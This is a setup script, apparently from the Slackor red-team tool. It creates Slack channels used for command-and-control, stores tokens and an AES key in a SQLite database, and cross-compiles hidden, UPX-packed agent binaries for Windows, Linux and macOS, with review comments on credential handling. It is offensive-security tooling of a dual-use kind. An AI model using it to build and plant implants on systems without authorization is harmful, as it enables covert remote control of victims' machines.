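# setup.py -- github.com/n00py/Slackor@v0.0.0-20200610224921-d007fcea1740
"""Interactive setup script.

Prompts for two Slack tokens, finds or creates the ``commands``,
``responses`` and ``registration`` channels, invites the workspace's bot
users to them, writes the tokens, the channel ids and a freshly generated
key to ``slackor.db``, and builds the Windows agent with those values
linked in.

NOTE(review): both Slack tokens and the cipher key end up in three places:
the terminal output, ``slackor.db`` (plain text columns) and every agent
binary (``-X`` stores them as ordinary string values). Anyone who obtains
one of those can read the workspace credentials, so treat all three as
secrets and revoke the tokens when the workspace is no longer needed.
"""
import hashlib
import json
import os
import random
import requests
import secrets
import sqlite3
import subprocess
import sys

HTTP_TIMEOUT = 30  # seconds; requests waits forever when no timeout is given
DB_PATH = 'slackor.db'
CONFIG_PKG = "github.com/n00py/Slackor/internal/config"

# Initialize variables
commands = None
responses = None
registration = None

# Create directories
if not os.path.exists("loot"):
    os.mkdir("loot")
if not os.path.exists("output"):
    os.mkdir("output")

print("First you must also create a Slack bot.\n"
      "Ensure your Slack app has these permissions before you continue:\nBot:\n"
      "\nchannels:history\nchannels:read\nchannels:write \nchat:write:\nusers:read\n"
      "User:\nchannels:history\nchannels:write\nfiles:read\nfiles:write")
token = input("Enter the OAuth Access Token: ")
bearer = input("Enter the Bot User OAuth Access Token: ")

# NOTE(review): these two lines echo live credentials; they will be captured
# by terminal scrollback and by any log the output is redirected to.
print("OAuth Access Token: " + token)
print("Bot User OAuth Access Token: " + bearer)

print("Attempting to create Slack channels...")

headers = {'Authorization': 'Bearer ' + bearer}


def _slack_get(url):
    """GET a Slack Web API URL with the bot token and return the decoded JSON."""
    reply = requests.get(url, headers=headers, timeout=HTTP_TIMEOUT)
    return json.loads(reply.text)


def _slack_post(url, payload):
    """POST form data to a Slack Web API URL and return the decoded JSON."""
    reply = requests.post(url, headers=headers, data=payload, timeout=HTTP_TIMEOUT)
    return json.loads(reply.text)


def _require(result, key, what):
    """Exit with the API's own answer when *key* is missing from *result*.

    An error reply has no payload key, which previously surfaced as a bare
    KeyError traceback.
    """
    if key not in result:
        print(result)
        sys.exit("Could not " + what + "; check both tokens and the app permissions")
    return result[key]


def _create_channel(label, name, extra=None):
    """Create channel *name* and return its id; exit if Slack refuses.

    The failure text is the original one, but the raw reply is now printed
    for every channel, because "already exists" is only one of the reasons
    the call can fail.
    """
    payload = {"token": token, "name": name}
    if extra:
        payload.update(extra)
    result = _slack_post('https://slack.com/api/channels.create', payload)
    try:
        channel_id = result["channel"]["id"]
    except KeyError:
        print(result)
        print(label + " channel already exists, log into Slack and delete it manually")
        print("Go to: Channel Settings -> Additional Options - > Delete this Channel")
        sys.exit(1)  # non-zero so a calling script can tell setup failed
    print(label + " channel: " + channel_id)
    return channel_id


def _run(argv, extra_env=None):
    """Run an external tool without a shell and report a failure.

    Best effort, like the original: a missing tool or a non-zero exit is
    printed and the script carries on. Returns True on success.
    """
    env = dict(os.environ, **extra_env) if extra_env else None
    try:
        status = subprocess.run(argv, env=env).returncode
    except FileNotFoundError:
        print(argv[0] + " was not found on PATH")
        return False
    if status != 0:
        print(argv[0] + " exited with status " + str(status))
    return status == 0


# Check if channels exist
listing = _slack_get('https://slack.com/api/channels.list')
for channel in _require(listing, "channels", "list Slack channels"):
    if channel["name"] == "commands":
        commands = channel["id"]
        print("Existing commands channel found")
    if channel["name"] == "registration":
        registration = channel["id"]
        print("Existing registration channel found")
    if channel["name"] == "responses":
        responses = channel["id"]
        print("Existing response channel found")

# Create channels
if commands is None:
    commands = _create_channel("Commands", "commands", {"validate": "True"})
if responses is None:
    responses = _create_channel("Responses", "responses")
if registration is None:
    registration = _create_channel("Registration", "registration")

# Invite bot user to created channels
directory = _slack_get('https://slack.com/api/users.list')
slackusers = [user["id"]
              for user in _require(directory, "members", "list Slack users")
              if user["is_bot"]]
for channel in [commands, responses, registration]:
    data = {"token": token, "channel": channel, "users": ','.join(slackusers)}
    result = _slack_post('https://slack.com/api/conversations.invite', data)
    # Only claim success when Slack reports it; a refusal is not fatal.
    if result.get("ok"):
        print("Added bot account to channel " + channel)
    else:
        print("Could not add bot account to channel " + channel + ": " + str(result.get("error")))

# If a database already exists, remove it
try:
    os.remove(DB_PATH)
    print("Deleting current database...")
except OSError:
    pass
# Create the file owner-only before any secret is written to it; SQLite
# treats an empty file as a new database.
os.close(os.open(DB_PATH, os.O_CREAT | os.O_WRONLY, 0o600))
conn = sqlite3.connect(DB_PATH)
try:
    print("Creating AES key...")
    # 32 upper-case hex characters, as before, but drawn from the OS CSPRNG:
    # the random module is a seeded Mersenne Twister and must not be used
    # for key material.
    aes_key = secrets.token_hex(16).upper()
    # NOTE(review): prints the key in clear; see the module docstring.
    print(aes_key)
    print("Created new database file...")
    print("Putting keys in the database...")
    # Create table for keys
    conn.execute('''CREATE TABLE KEYS
             (ID TEXT PRIMARY KEY     NOT NULL,
             TOKEN           TEXT    NOT NULL,
             BEARER           TEXT    NOT NULL,
             AES            TEXT     NOT NULL);''')
    # Bound parameters: the tokens are typed in by hand and the channel ids
    # come from a network reply, so neither may be spliced into SQL text.
    conn.execute("INSERT INTO KEYS (ID,TOKEN,BEARER,AES) VALUES (?, ?, ?, ?)",
                 ('1', token, bearer, aes_key))

    print("Adding slack channels to the database...")

    # Create table for channels
    conn.execute('''CREATE TABLE CHANNELS
             (ID TEXT PRIMARY KEY     NOT NULL,
             COMMANDS           TEXT    NOT NULL,
             RESPONSES           TEXT    NOT NULL,
             REGISTRATION            TEXT);''')
    conn.execute("INSERT INTO CHANNELS (ID,COMMANDS,RESPONSES,REGISTRATION) VALUES (?, ?, ?, ?)",
                 ('1', commands, responses, registration))

    # Create table for holding agents
    conn.execute('''CREATE TABLE AGENTS
             (ID TEXT PRIMARY KEY     NOT NULL,
             HOSTNAME           TEXT    NOT NULL,
             USER           TEXT    NOT NULL,
             IP            TEXT    NOT NULL,
             VERSION            TEXT);''')
    conn.commit()
finally:
    conn.close()
print("Database created successfully")

# Build the Windows exe and make the copy used for the packed variant.
# The command is passed as an argument list with no shell in between, so a
# quote, "$" or backtick in a token or channel id stays literal text instead
# of being interpreted by bash. go receives the same -ldflags string as before.
# NOTE(review): the secrets are still command-line arguments and are visible
# in the process list while the build runs.
embedded = [
    ("ResponseChannel", responses),
    ("RegistrationChannel", registration),
    ("CommandsChannel", commands),
    ("Bearer", bearer),
    ("Token", token),
    ("CipherKey", aes_key),
    ("SerialNumber", '%0128x' % random.randrange(16**128)),
]
ldflags = "-s -w -H windowsgui " + " ".join(
    "-X %s.%s=%s" % (CONFIG_PKG, field, value) for field, value in embedded)
_run(["go", "build", "-o", "dist/agent.windows.exe", "-ldflags", ldflags, "agent.go"],
     {"GO111MODULE": "on", "GOOS": "windows", "GOARCH": "amd64"})
_run(["cp", "-p", "dist/agent.windows.exe", "dist/agent.upx.exe"])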
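def _run_tool(argv, extra_env=None):
    """Run an external tool without a shell and report a failure.

    Best effort: a missing tool or a non-zero exit status is printed and the
    script continues. Returns True when the tool exited with status 0.
    """
    env = dict(os.environ, **extra_env) if extra_env else None
    try:
        status = subprocess.run(argv, env=env).returncode
    except FileNotFoundError:
        print(argv[0] + " was not found on PATH")
        return False
    if status != 0:
        print(argv[0] + " exited with status " + str(status))
    return status == 0


def _build_agent(goos, goarch, output):
    """Build agent.go for one GOOS/GOARCH pair into *output*.

    The channel ids, both tokens, the cipher key and a fresh random serial
    number are set through -X, exactly as in the original command lines. The
    command is an argument list rather than a string handed to ``bash -c``,
    so shell metacharacters in a token or in a channel id taken from a
    network reply are never interpreted.

    NOTE(review): -X stores these values as ordinary strings in the binary,
    and they are visible in the process list while the build runs; every
    artefact under dist/ should be handled as a credential.
    """
    package = "github.com/n00py/Slackor/internal/config"
    embedded = [
        ("ResponseChannel", responses),
        ("RegistrationChannel", registration),
        ("CommandsChannel", commands),
        ("Bearer", bearer),
        ("Token", token),
        ("CipherKey", aes_key),
        ("SerialNumber", '%0128x' % random.randrange(16**128)),
    ]
    ldflags = "-s -w " + " ".join(
        "-X %s.%s=%s" % (package, field, value) for field, value in embedded)
    return _run_tool(
        ["go", "build", "-o", output, "-ldflags", ldflags, "agent.go"],
        {"GO111MODULE": "on", "GOOS": goos, "GOARCH": goarch})


_run_tool(["upx", "--force", "dist/agent.upx.exe"])

# Build for linux and macOS
_build_agent("linux", "amd64", "dist/agent.64.linux")
_build_agent("linux", "386", "dist/agent.32.linux")
_build_agent("darwin", "amd64", "dist/agent.darwin")

# Print hashes
filenames = ["dist/agent.windows.exe", "dist/agent.upx.exe", "dist/agent.64.linux", "dist/agent.32.linux", "dist/agent.darwin"]
for filename in filenames:
    digest = hashlib.sha256()
    try:
        # Hash in chunks and close the handle; the original read each whole
        # file into memory and never closed it.
        with open(filename, 'rb') as artefact:
            for chunk in iter(lambda: artefact.read(65536), b''):
                digest.update(chunk)
    except OSError as err:
        # A failed build leaves no file; say so and hash the remaining ones
        # instead of stopping with a traceback.
        print("Could not hash " + filename + ": " + str(err))
        continue
    print(digest.hexdigest() + " " + filename)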